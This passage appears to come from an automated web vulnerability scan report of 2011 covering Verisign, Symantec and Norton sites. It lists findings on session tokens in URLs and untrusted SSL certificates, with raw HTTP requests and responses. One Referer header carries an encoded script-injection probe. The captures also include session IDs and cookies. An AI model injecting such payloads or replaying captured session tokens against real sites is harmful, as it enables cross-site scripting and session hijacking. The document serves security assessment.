Path:	/scripts/global.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://idprotect.verisign.com/scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Request

GET /scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:47:12 GMT
Server: Apache
Location: https://idprotect.verisign.com/scripts/global.js
Content-Length: 329
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.4. https://idprotect.verisign.com/toolbar/activate.v previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The response contains the following links that appear to contain session tokens:

https://idprotect.verisign.com/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
https://idprotect.verisign.com/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
https://idprotect.verisign.com/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc

Request

GET /toolbar/activate.v HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:48:59 GMT
Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Length: 7564
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<meta http-equiv="Expires" content="0" />

<link rel="icon" href="/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"/>

<title>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print"
href="/common/styles/print.css" />

<script type="text/javascript"
src="/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"></script>
...[SNIP]...
<br/>

<img id="kaptchaImage" src="/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc" alt="Click for a different one!" title="Click for a different one!" />  
<img id="kaptchaRefresh" src="/brand-verisign/images/ico_refresh_captcha.gif" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

7.5. http://m.verisign.com/home.v previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://m.verisign.com
Path:	/home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2

Request

GET /home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 HTTP/1.1
Host: m.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:03:49 GMT
Server: Apache
Location: http://vipmobile.verisign.com/home.v
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/ubox/image

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox3.offermatica.com/m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25

Request

GET /m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.verisign.com/stellent/groups/public/documents/image/spacer.gif
Content-Length: 0
Date: Fri, 09 Sep 2011 21:24:33 GMT
Server: Test & Target

7.8. http://player.ooyala.com/sas/authorized previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://player.ooyala.com
Path:	/sas/authorized

Issue detail

The URL in the request appears to contain a session token within the query string:

http://player.ooyala.com/sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7

Request

GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Status: 200 OK
Content-Type: text/xml
Content-Length: 716
Cache-Control: public, no-cache
Date: Fri, 09 Sep 2011 21:26:08 GMT
Connection: close

iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn
h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9
kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO
JotiY/UdyOFK+TiH1
...[SNIP]...

7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://renewals.symantec.com
Path:	/renewals/images/icon-pop-up.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://renewals.symantec.com/renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Request

GET /renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435 HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Length: 60
Content-Type: image/gif
Last-Modified: Thu, 18 Mar 2010 01:42:30 GMT
Accept-Ranges: bytes

GIF89a . .....G....!.......,.... . ......g.....O...U...-G..;

7.10. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sales.liveperson.net/hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

7.11. https://securitycenter.verisign.com/celp/enroll/retail previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/retail

Issue detail

The URL in the request appears to contain a session token within the query string:

https://securitycenter.verisign.com/celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:17 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39

Request

GET /m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.norton.com/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1591
Date: Fri, 09 Sep 2011 21:30:58 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('norton_lp_redirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau
...[SNIP]...

7.13. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The URL in the request appears to contain a session token within the query string:

https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001

Request

Response

7.14. http://vipmobile.verisign.com/images/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

http://vipmobile.verisign.com/images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2

Request

GET /images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2 HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; __fds_fp_id__=44590564957.2; JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:04:01 GMT
Server: Apache
Location: http://vipmobile.verisign.com/images/favicon.ico
Content-Length: 328
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.15. https://vipmobile.verisign.com/home.v previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://vipmobile.verisign.com
Path:	/home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

https://vipmobile.verisign.com/home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1

Request

GET /home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1 HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:52:05 GMT
Server: Apache
Location: https://vipmobile.verisign.com/home.v
Content-Length: 318
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://vipmobile.veris
...[SNIP]...

8. SSL certificate previous next
There are 37 instances of this issue:

https://fileconnect.symantec.com/
https://forms.verisign.com/
https://knowledge.verisign.ch/
https://knowledge.verisign.com/
https://onlinefamily.norton.com/
https://query.verisign.com/
https://ssl-certificate-center.verisign.ch/
https://ssl-certificate-center.verisign.com/
https://trust-center.verisign.ch/
https://trust-center.verisign.com/
https://us.norton.com/
https://admin.instantservice.com/
https://buy-static.norton.com/
https://cdn.verisign.com/
https://cert.webtrust.org/
https://donate.mozilla.org/
https://drh.img.digitalriver.com/
https://enterprise-ssl-admin.verisign.com/
https://idprotect.verisign.com/
https://partnernet.symantec.com/
https://policy3.responsys.net/
https://press.verisign.com/
https://products.geotrust.com/
https://products.verisign.com/
https://renewals.symantec.com/
https://seal.verisign.com/
https://securitycenter.verisign.com/
https://symaccount.symantec.com/
https://symantec-corporation.com/
https://test-products.verisign.com/
https://vipdeveloper.verisign.com/
https://vipmanager.verisign.com/
https://vipmobile.verisign.com/
https://vs.symantec.com/
https://www-secure.symantec.com/
https://www.verisign.com/
https://www4.symantec.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

8.1. https://fileconnect.symantec.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	FILECONNECT.SYMANTEC.COM
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:	Sat Jul 07 17:59:59 GMT-06:00 2012

8.2. https://forms.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://forms.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	forms.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun May 29 18:00:00 GMT-06:00 2011
Valid to:	Wed May 29 17:59:59 GMT-06:00 2013

8.3. https://knowledge.verisign.ch/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	vrsn-intl.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Jun 08 18:00:00 GMT-06:00 2010
Valid to:	Fri Jun 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
